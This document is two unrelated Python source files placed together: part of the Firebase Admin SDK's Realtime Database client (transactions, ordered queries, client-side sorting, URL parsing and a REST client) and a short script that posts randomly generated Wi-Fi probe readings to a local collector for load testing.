transaction_update: A function which will be passed the current data stored at this
location. The function should return the new value it would like written. If
an exception is raised, the transaction will be aborted, and the data at this
location will not be modified. The exceptions raised by this function are
propagated to the caller of the transaction method.
Returns:
object: New value of the current database Reference (only if the transaction commits).
Raises:
TransactionAbortedError: If the transaction aborts after exhausting all retry attempts.
ValueError: If transaction_update is not a function.
"""
if not callable(transaction_update):
raise ValueError('transaction_update must be a function.')
tries = 0
data, etag = self.get(etag=True)
while tries < _TRANSACTION_MAX_RETRIES:
new_data = transaction_update(data)
success, data, etag = self.set_if_unchanged(etag, new_data)
if success:
return new_data
tries += 1
raise TransactionAbortedError('Transaction aborted after failed retries.')
def order_by_child(self, path):
"""Returns a Query that orders data by child values.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Args:
path: Path to a valid child of the current Reference.
Returns:
Query: A database Query instance.
Raises:
ValueError: If the child path is not a string, not well-formed or None.
"""
if path in _RESERVED_FILTERS:
raise ValueError('Illegal child path: {0}'.format(path))
return Query(order_by=path, client=self._client, pathurl=self._add_suffix())
def order_by_key(self):
"""Creates a Query that orderes data by key.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Returns:
Query: A database Query instance.
"""
return Query(order_by='$key', client=self._client, pathurl=self._add_suffix())
def order_by_value(self):
"""Creates a Query that orderes data by value.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Returns:
Query: A database Query instance.
"""
return Query(order_by='$value', client=self._client, pathurl=self._add_suffix())
def _add_suffix(self, suffix='.json'):
return self._pathurl + suffix
def _listen_with_session(self, callback, session):
url = self._client.base_url + self._add_suffix()
try:
sse = _sseclient.SSEClient(url, session)
return ListenerRegistration(callback, sse)
except requests.exceptions.RequestException as error:
raise _Client.handle_rtdb_error(error)
class Query(object):
"""Represents a complex query that can be executed on a Reference.
Complex queries can consist of up to 2 components: a required ordering constraint, and an
optional filtering constraint. At the server, data is first sorted according to the given
ordering constraint (e.g. order by child). Then the filtering constraint (e.g. limit, range)
is applied on the sorted data to produce the final result. Despite the ordering constraint,
the final result is returned by the server as an unordered collection. Therefore the Query
interface performs another round of sorting at the client-side before returning the results
to the caller. This client-side sorted results are returned to the user as a Python
OrderedDict.
"""
def __init__(self, **kwargs):
order_by = kwargs.pop('order_by')
if not order_by or not isinstance(order_by, six.string_types):
raise ValueError('order_by field must be a non-empty string')
if order_by not in _RESERVED_FILTERS:
if order_by.startswith('/'):
raise ValueError('Invalid path argument: "{0}". Child path must not start '
'with "/"'.format(order_by))
segments = _parse_path(order_by)
order_by = '/'.join(segments)
self._client = kwargs.pop('client')
self._pathurl = kwargs.pop('pathurl')
self._order_by = order_by
self._params = {'orderBy' : json.dumps(order_by)}
if kwargs:
raise ValueError('Unexpected keyword arguments: {0}'.format(kwargs))
def limit_to_first(self, limit):
"""Creates a query with limit, and anchors it to the start of the window.
Args:
limit: The maximum number of child nodes to return.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is not an integer, or limit_to_last() was called previously.
"""
if not isinstance(limit, int) or limit < 0:
raise ValueError('Limit must be a non-negative integer.')
if 'limitToLast' in self._params:
raise ValueError('Cannot set both first and last limits.')
self._params['limitToFirst'] = limit
return self
def limit_to_last(self, limit):
"""Creates a query with limit, and anchors it to the end of the window.
Args:
limit: The maximum number of child nodes to return.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is not an integer, or limit_to_first() was called previously.
"""
if not isinstance(limit, int) or limit < 0:
raise ValueError('Limit must be a non-negative integer.')
if 'limitToFirst' in self._params:
raise ValueError('Cannot set both first and last limits.')
self._params['limitToLast'] = limit
return self
def start_at(self, start):
"""Sets the lower bound for a range query.
The Query will only return child nodes with a value greater than or equal to the specified
value.
Args:
start: JSON-serializable value to start at, inclusive.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if start is None:
raise ValueError('Start value must not be None.')
self._params['startAt'] = json.dumps(start)
return self
def end_at(self, end):
"""Sets the upper bound for a range query.
The Query will only return child nodes with a value less than or equal to the specified
value.
Args:
end: JSON-serializable value to end at, inclusive.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if end is None:
raise ValueError('End value must not be None.')
self._params['endAt'] = json.dumps(end)
return self
def equal_to(self, value):
"""Sets an equals constraint on the Query.
The Query will only return child nodes whose value is equal to the specified value.
Args:
value: JSON-serializable value to query for.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if value is None:
raise ValueError('Equal to value must not be None.')
self._params['equalTo'] = json.dumps(value)
return self
@property
def _querystr(self):
params = []
for key in sorted(self._params):
params.append('{0}={1}'.format(key, self._params[key]))
return '&'.join(params)
def get(self):
"""Executes this Query and returns the results.
The results will be returned as a sorted list or an OrderedDict.
Returns:
object: Decoded JSON result of the Query.
Raises:
FirebaseError: If an error occurs while communicating with the remote database server.
"""
result = self._client.body('get', self._pathurl, params=self._querystr)
if isinstance(result, (dict, list)) and self._order_by != '$priority':
return _Sorter(result, self._order_by).get()
return result
class TransactionAbortedError(exceptions.AbortedError):
"""A transaction was aborted aftr exceeding the maximum number of retries."""
def __init__(self, message):
exceptions.AbortedError.__init__(self, message)
class _Sorter(object):
"""Helper class for sorting query results."""
def __init__(self, results, order_by):
if isinstance(results, dict):
self.dict_input = True
entries = [_SortEntry(k, v, order_by) for k, v in results.items()]
elif isinstance(results, list):
self.dict_input = False
entries = [_SortEntry(k, v, order_by) for k, v in enumerate(results)]
else:
raise ValueError('Sorting not supported for "{0}" object.'.format(type(results)))
self.sort_entries = sorted(entries)
def get(self):
if self.dict_input:
return collections.OrderedDict([(e.key, e.value) for e in self.sort_entries])
else:
return [e.value for e in self.sort_entries]
class _SortEntry(object):
"""A wrapper that is capable of sorting items in a dictionary."""
_type_none = 0
_type_bool_false = 1
_type_bool_true = 2
_type_numeric = 3
_type_string = 4
_type_object = 5
def __init__(self, key, value, order_by):
self._key = key
self._value = value
if order_by == '$key' or order_by == '$priority':
self._index = key
elif order_by == '$value':
self._index = value
else:
self._index = _SortEntry._extract_child(value, order_by)
self._index_type = _SortEntry._get_index_type(self._index)
@property
def key(self):
return self._key
@property
def index(self):
return self._index
@property
def index_type(self):
return self._index_type
@property
def value(self):
return self._value
@classmethod
def _get_index_type(cls, index):
"""Assigns an integer code to the type of the index.
The index type determines how differently typed values are sorted. This ordering is based
on https://firebase.google.com/docs/database/rest/retrieve-data#section-rest-ordered-data
"""
if index is None:
return cls._type_none
elif isinstance(index, bool) and not index:
return cls._type_bool_false
elif isinstance(index, bool) and index:
return cls._type_bool_true
elif isinstance(index, (int, float)):
return cls._type_numeric
elif isinstance(index, six.string_types):
return cls._type_string
else:
return cls._type_object
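    # The codes above define the cross-type ordering used when two indices differ in type:
    # None < False < True < numbers < strings < objects. For example:
    #
    #     _SortEntry._get_index_type(None)    # -> 0 (_type_none)
    #     _SortEntry._get_index_type(3.5)     # -> 3 (_type_numeric)
    #     _SortEntry._get_index_type('abc')   # -> 4 (_type_string)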
@classmethod
def _extract_child(cls, value, path):
segments = path.split('/')
current = value
for segment in segments:
if isinstance(current, dict):
current = current.get(segment)
else:
return None
return current
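    # Example of the child extraction above: a "/"-separated path walks nested dicts and
    # returns None as soon as a segment is missing or a non-dict value is reached.
    #
    #     _SortEntry._extract_child({'a': {'b': 3}}, 'a/b')   # -> 3
    #     _SortEntry._extract_child({'a': 5}, 'a/b')          # -> None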
def _compare(self, other):
"""Compares two _SortEntry instances.
If the indices have the same numeric or string type, compare them directly. Ties are
broken by comparing the keys. If the indices have the same type, but are neither numeric
nor string, compare the keys. In all other cases compare based on the ordering provided
by index types.
"""
self_key, other_key = self.index_type, other.index_type
if self_key == other_key:
if self_key in (self._type_numeric, self._type_string) and self.index != other.index:
self_key, other_key = self.index, other.index
else:
self_key, other_key = self.key, other.key
if self_key < other_key:
return -1
elif self_key > other_key:
return 1
else:
return 0
def __lt__(self, other):
return self._compare(other) < 0
def __le__(self, other):
return self._compare(other) <= 0
def __gt__(self, other):
return self._compare(other) > 0
def __ge__(self, other):
return self._compare(other) >= 0
def __eq__(self, other):
        return self._compare(other) == 0
class _DatabaseService(object):
"""Service that maintains a collection of database clients."""
_DEFAULT_AUTH_OVERRIDE = '_admin_'
def __init__(self, app):
self._credential = app.credential
db_url = app.options.get('databaseURL')
if db_url:
_DatabaseService._parse_db_url(db_url) # Just for validation.
self._db_url = db_url
else:
self._db_url = None
auth_override = _DatabaseService._get_auth_override(app)
if auth_override != self._DEFAULT_AUTH_OVERRIDE and auth_override != {}:
self._auth_override = json.dumps(auth_override, separators=(',', ':'))
else:
self._auth_override = None
self._timeout = app.options.get('httpTimeout')
self._clients = {}
emulator_host = os.environ.get(_EMULATOR_HOST_ENV_VAR)
if emulator_host:
if '//' in emulator_host:
raise ValueError(
'Invalid {0}: "{1}". It must follow format "host:port".'.format(
_EMULATOR_HOST_ENV_VAR, emulator_host))
self._emulator_host = emulator_host
else:
self._emulator_host = None
def get_client(self, db_url=None):
"""Creates a client based on the db_url. Clients may be cached."""
if db_url is None:
db_url = self._db_url
base_url, namespace = _DatabaseService._parse_db_url(db_url, self._emulator_host)
if base_url == 'https://{0}.firebaseio.com'.format(namespace):
# Production base_url. No need to specify namespace in query params.
params = {}
credential = self._credential.get_credential()
else:
# Emulator base_url. Use fake credentials and specify ?ns=foo in query params.
credential = _EmulatorAdminCredentials()
params = {'ns': namespace}
if self._auth_override:
params['auth_variable_override'] = self._auth_override
client_cache_key = (base_url, json.dumps(params, sort_keys=True))
if client_cache_key not in self._clients:
client = _Client(credential, base_url, self._timeout, params)
self._clients[client_cache_key] = client
return self._clients[client_cache_key]
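    # Note on the cache key above: calls that resolve to the same base URL and the same
    # query params (including any auth override) share one _Client, so, for a hypothetical
    # production URL, repeated get_client('https://foo-bar.firebaseio.com') calls reuse a
    # single HTTP session.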
@classmethod
def _parse_db_url(cls, url, emulator_host=None):
"""Parses (base_url, namespace) from a database URL.
The input can be either a production URL (https://foo-bar.firebaseio.com/)
or an Emulator URL (http://localhost:8080/?ns=foo-bar). In case of Emulator
URL, the namespace is extracted from the query param ns. The resulting
base_url never includes query params.
If url is a production URL and emulator_host is specified, the result
base URL will use emulator_host instead. emulator_host is ignored
if url is already an emulator URL.
"""
if not url or not isinstance(url, six.string_types):
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a non-empty '
'URL string.'.format(url))
parsed_url = urllib.parse.urlparse(url)
if parsed_url.netloc.endswith('.firebaseio.com'):
return cls._parse_production_url(parsed_url, emulator_host)
else:
return cls._parse_emulator_url(parsed_url)
@classmethod
def _parse_production_url(cls, parsed_url, emulator_host):
"""Parses production URL like https://foo-bar.firebaseio.com/"""
if parsed_url.scheme != 'https':
raise ValueError(
'Invalid database URL scheme: "{0}". Database URL must be an HTTPS URL.'.format(
parsed_url.scheme))
namespace = parsed_url.netloc.split('.')[0]
if not namespace:
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a valid URL to a '
'Firebase Realtime Database instance.'.format(parsed_url.geturl()))
if emulator_host:
base_url = 'http://{0}'.format(emulator_host)
else:
base_url = 'https://{0}'.format(parsed_url.netloc)
return base_url, namespace
@classmethod
def _parse_emulator_url(cls, parsed_url):
"""Parses emulator URL like http://localhost:8080/?ns=foo-bar"""
query_ns = urllib.parse.parse_qs(parsed_url.query).get('ns')
if parsed_url.scheme != 'http' or (not query_ns or len(query_ns) != 1 or not query_ns[0]):
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a valid URL to a '
'Firebase Realtime Database instance.'.format(parsed_url.geturl()))
namespace = query_ns[0]
base_url = '{0}://{1}'.format(parsed_url.scheme, parsed_url.netloc)
return base_url, namespace
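    # Illustrative results of the two parsers above (hypothetical hosts):
    #
    #     _parse_db_url('https://foo-bar.firebaseio.com/')
    #     # -> ('https://foo-bar.firebaseio.com', 'foo-bar')
    #     _parse_db_url('https://foo-bar.firebaseio.com/', emulator_host='localhost:9000')
    #     # -> ('http://localhost:9000', 'foo-bar')
    #     _parse_db_url('http://localhost:9000/?ns=foo-bar')
    #     # -> ('http://localhost:9000', 'foo-bar')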
@classmethod
def _get_auth_override(cls, app):
auth_override = app.options.get('databaseAuthVariableOverride', cls._DEFAULT_AUTH_OVERRIDE)
if auth_override == cls._DEFAULT_AUTH_OVERRIDE or auth_override is None:
return auth_override
if not isinstance(auth_override, dict):
raise ValueError('Invalid databaseAuthVariableOverride option: "{0}". Override '
'value must be a dict or None.'.format(auth_override))
else:
return auth_override
def close(self):
for value in self._clients.values():
value.close()
self._clients = {}
class _Client(_http_client.JsonHttpClient):
"""HTTP client used to make REST calls.
_Client maintains an HTTP session, and handles authenticating HTTP requests along with
marshalling and unmarshalling of JSON data.
"""
def __init__(self, credential, base_url, timeout, params=None):
"""Creates a new _Client from the given parameters.
This exists primarily to enable testing. For regular use, obtain _Client instances by
calling the from_app() class method.
Args:
credential: A Google credential that can be used to authenticate requests.
base_url: A URL prefix to be added to all outgoing requests. This is typically the
Firebase Realtime Database URL.
timeout: HTTP request timeout in seconds. If not set connections will never
timeout, which is the default behavior of the underlying requests library.
params: Dict of query parameters to add to all outgoing requests.
"""
_http_client.JsonHttpClient.__init__(
self, credential=credential, base_url=base_url, headers={'User-Agent': _USER_AGENT})
self.credential = credential
self.timeout = timeout
self.params = params if params else {}
def request(self, method, url, **kwargs):
"""Makes an HTTP call using the Python requests library.
Extends the request() method of the parent JsonHttpClient class. Handles default
params like auth overrides, and low-level exceptions.
Args:
method: HTTP method name as a string (e.g. get, post).
url: URL path of the remote endpoint. This will be appended to the server's base URL.
kwargs: An additional set of keyword arguments to be passed into requests API
(e.g. json, params).
Returns:
Response: An HTTP response object.
Raises:
FirebaseError: If an error occurs while making the HTTP call.
"""
query = '&'.join('{0}={1}'.format(key, self.params[key]) for key in self.params)
extra_params = kwargs.get('params')
if extra_params:
if query:
query = extra_params + '&' + query
else:
query = extra_params
kwargs['params'] = query
if self.timeout:
kwargs['timeout'] = self.timeout
try:
return super(_Client, self).request(method, url, **kwargs)
except requests.exceptions.RequestException as error:
raise _Client.handle_rtdb_error(error)
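    # Example of the param merging above (hypothetical values): with self.params set to
    # {'ns': 'foo-bar'} and a caller passing params='shallow=true', the request goes out
    # with the combined query string 'shallow=true&ns=foo-bar'.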
@classmethod
def handle_rtdb_error(cls, error):
"""Converts an error encountered while calling RTDB into a FirebaseError."""
if error.response is None:
return _utils.handle_requests_error(error)
message = cls._extract_error_message(error.response)
return _utils.handle_requests_error(error, message=message)
@classmethod
def _extract_error_message(cls, response):
"""Extracts an error message from an error response.
If the server has sent a JSON response with an 'error' field, which is the typical
behavior of the Realtime Database REST API, parses the response to retrieve the error
message. If the server has sent a non-JSON response, returns the full response
as the error message.
"""
message = None
try:
# RTDB error format: {"error": "text message"}
data = response.json()
if isinstance(data, dict):
message = data.get('error')
except ValueError:
pass
if not message:
message = 'Unexpected response from database: {0}'.format(response.content.decode())
return message
class _EmulatorAdminCredentials(google.auth.credentials.Credentials):
def __init__(self):
google.auth.credentials.Credentials.__init__(self)
self.token = 'owner'
def refresh(self, request):
pass
|
SimulatedSendPackets.py
|
#coding=utf-8
import random
import threading
from time import ctime,sleep
import json
import requests
import time
def random_mac():
macList = []
for i in range(1, 7):
randStr = "".join(random.sample("0123456789abcdef",2))
macList.append(randStr)
randMac = ":".join(macList)
return randMac
def random_rssi():
return str(random.randrange(-100, 0))
def random_range():
return str(round(random.uniform(0, 100), 1))
def random_id():
return str(random.randrange(1, 1000))
probeList = []
# Simulate a single probe device posting one packet report to the collector
def send_random_json():
    headers = {'Content-Type': 'application/json'}
    probe = {"id": random_id(), "mmac": random_mac(), "rate": "3", "wssid": "test",
             "wmac": random_mac(),
             "time": time.strftime('%a %b %e %H:%M:%S %Y', time.localtime(time.time()))}
    # Attach between one and four randomized client readings to this report.
    mac_DataMul = []
    for i in range(random.randrange(1, 5)):
        mac_DataMul.append({"mac": random_mac(), "rssi": random_rssi(), "range": random_range()})
    probe['data'] = mac_DataMul
    payload = json.dumps(probe)
    print(payload)
    response = requests.post(url='http://localhost:8000/upload.action', headers=headers, data=payload)
    print("response code:", response.status_code)
# Simulate multi-threaded packet sending
def send_rand_json_with_multi_thread():
    threads = []
    # Pre-build a batch of probe payloads for reference only; the worker threads below
    # generate their own random payloads inside send_random_json().
    for i in range(10):
        probe = {"id": i, "mmac": random_mac(), "rate": 3, "wssid": "test", "wmac": random_mac()}
        probeList.append(json.dumps(probe))
    for i in range(10):
        t = threading.Thread(target=send_random_json)
        t.setDaemon(True)
        threads.append(t)
        t.start()
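# Usage sketch (assumes the collector at http://localhost:8000/upload.action used by
# send_random_json() is reachable): send_rand_json_with_multi_thread() fires ten daemon
# threads, each posting one randomly generated report.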
if __name__ == '__main__':
    # Send one randomized probe report per second, 1000 reports in total.
    for i in range(1000):
        send_random_json()
        sleep(1)
    print("all over %s" % ctime())
|